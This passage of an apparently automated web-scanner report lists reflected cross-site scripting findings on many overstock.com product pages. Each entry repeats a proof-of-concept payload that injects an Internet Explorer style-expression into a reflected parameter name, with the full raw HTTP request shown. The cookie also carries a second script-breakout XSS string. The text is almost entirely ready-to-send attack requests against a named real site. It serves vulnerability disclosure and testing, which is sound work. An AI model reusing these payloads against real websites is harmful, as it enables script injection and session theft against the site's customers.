GET /Home-Garden/Perry-Ellis-Microfiber-Polyester-4-piece-Sheet-Set/4820137/product.html?c8c26"style%3d"x%3aexpression(alert(1))"95e1a9ef18f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.322. http://www.overstock.com/Home-Garden/Perry-Ellis-Romance-Floral-7-piece-Bed-in-a-Bag-with-Sheet-Set/4488423/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa24c"style%3d"x%3aexpression(alert(1))"a39cc40e674 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa24c"style="x:expression(alert(1))"a39cc40e674 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Perry-Ellis-Romance-Floral-7-piece-Bed-in-a-Bag-with-Sheet-Set/4488423/product.html?aa24c"style%3d"x%3aexpression(alert(1))"a39cc40e674=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.323. http://www.overstock.com/Home-Garden/Perry-Ellis-Sweet-Bay-7-piece-Bed-in-a-Bag-with-Sheet-Set/4488526/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0c58"style%3d"x%3aexpression(alert(1))"aafbdb1445d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c0c58"style="x:expression(alert(1))"aafbdb1445d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Perry-Ellis-Sweet-Bay-7-piece-Bed-in-a-Bag-with-Sheet-Set/4488526/product.html?c0c58"style%3d"x%3aexpression(alert(1))"aafbdb1445d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.324. http://www.overstock.com/Home-Garden/Pima-Cotton-Sateen-1000-Thread-Count-Sheet-Set/4826799/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50b2a"style%3d"x%3aexpression(alert(1))"19b523963 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50b2a"style="x:expression(alert(1))"19b523963 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Pima-Cotton-Sateen-1000-Thread-Count-Sheet-Set/4826799/product.html?50b2a"style%3d"x%3aexpression(alert(1))"19b523963=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.325. http://www.overstock.com/Home-Garden/Plum-Blossom-IV-4-piece-Hand-painted-Canvas-Art-Set/5147344/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 352f8"style%3d"x%3aexpression(alert(1))"67c90d78964 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 352f8"style="x:expression(alert(1))"67c90d78964 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Plum-Blossom-IV-4-piece-Hand-painted-Canvas-Art-Set/5147344/product.html?352f8"style%3d"x%3aexpression(alert(1))"67c90d78964=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.326. http://www.overstock.com/Home-Garden/Prague-12-piece-Bed-in-a-Bag-with-Sheet-Set/5158974/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f325"style%3d"x%3aexpression(alert(1))"82ebf605a4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f325"style="x:expression(alert(1))"82ebf605a4b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Prague-12-piece-Bed-in-a-Bag-with-Sheet-Set/5158974/product.html?6f325"style%3d"x%3aexpression(alert(1))"82ebf605a4b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.327. http://www.overstock.com/Home-Garden/Premium-Arm-Chair-Outdoor-Furniture-Cover/5042850/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf6eb"style%3d"x%3aexpression(alert(1))"ec951b871ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf6eb"style="x:expression(alert(1))"ec951b871ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Premium-Arm-Chair-Outdoor-Furniture-Cover/5042850/product.html?bf6eb"style%3d"x%3aexpression(alert(1))"ec951b871ce=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.328. http://www.overstock.com/Home-Garden/Premium-Extra-Large-Rectangular-Table-Cover/4093387/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 388b2"style%3d"x%3aexpression(alert(1))"d7c5a6a2cd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 388b2"style="x:expression(alert(1))"d7c5a6a2cd6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Premium-Extra-Large-Rectangular-Table-Cover/4093387/product.html?388b2"style%3d"x%3aexpression(alert(1))"d7c5a6a2cd6=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.329. http://www.overstock.com/Home-Garden/Premium-Outdoor-Bench-Cover/4094606/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcabb"style%3d"x%3aexpression(alert(1))"41f72169241 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fcabb"style="x:expression(alert(1))"41f72169241 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Premium-Outdoor-Bench-Cover/4094606/product.html?fcabb"style%3d"x%3aexpression(alert(1))"41f72169241=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.330. http://www.overstock.com/Home-Garden/Premium-Outdoor-Sofa-Furniture-Cover/4094607/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce29b"style%3d"x%3aexpression(alert(1))"44a57cdc4c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ce29b"style="x:expression(alert(1))"44a57cdc4c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Premium-Outdoor-Sofa-Furniture-Cover/4094607/product.html?ce29b"style%3d"x%3aexpression(alert(1))"44a57cdc4c9=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.331. http://www.overstock.com/Home-Garden/Premium-Round-Table-Outdoor-Furniture-Cover/4093386/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7207"style%3d"x%3aexpression(alert(1))"cf601553362 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7207"style="x:expression(alert(1))"cf601553362 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Premium-Round-Table-Outdoor-Furniture-Cover/4093386/product.html?f7207"style%3d"x%3aexpression(alert(1))"cf601553362=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.332. http://www.overstock.com/Home-Garden/Protective-Six-leg-Canopy-10-x-20/4717852/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7f5b"style%3d"x%3aexpression(alert(1))"c8922452356 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7f5b"style="x:expression(alert(1))"c8922452356 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Protective-Six-leg-Canopy-10-x-20/4717852/product.html?c7f5b"style%3d"x%3aexpression(alert(1))"c8922452356=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.333. http://www.overstock.com/Home-Garden/Rainfall-Chrome-3.5-inch-Showerhead/495925/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d906"style%3d"x%3aexpression(alert(1))"49937f78396 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d906"style="x:expression(alert(1))"49937f78396 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Rainfall-Chrome-3.5-inch-Showerhead/495925/product.html?6d906"style%3d"x%3aexpression(alert(1))"49937f78396=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.334. http://www.overstock.com/Home-Garden/Reflections-Corner-Shelving-Unit/2105630/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d751"style%3d"x%3aexpression(alert(1))"b0cceddab2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7d751"style="x:expression(alert(1))"b0cceddab2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Reflections-Corner-Shelving-Unit/2105630/product.html?7d751"style%3d"x%3aexpression(alert(1))"b0cceddab2b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.335. http://www.overstock.com/Home-Garden/Renaissance-600-Thread-Count-Cotton-Sheet-Sets/3937028/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e124e"style%3d"x%3aexpression(alert(1))"9bbcde06c11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e124e"style="x:expression(alert(1))"9bbcde06c11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
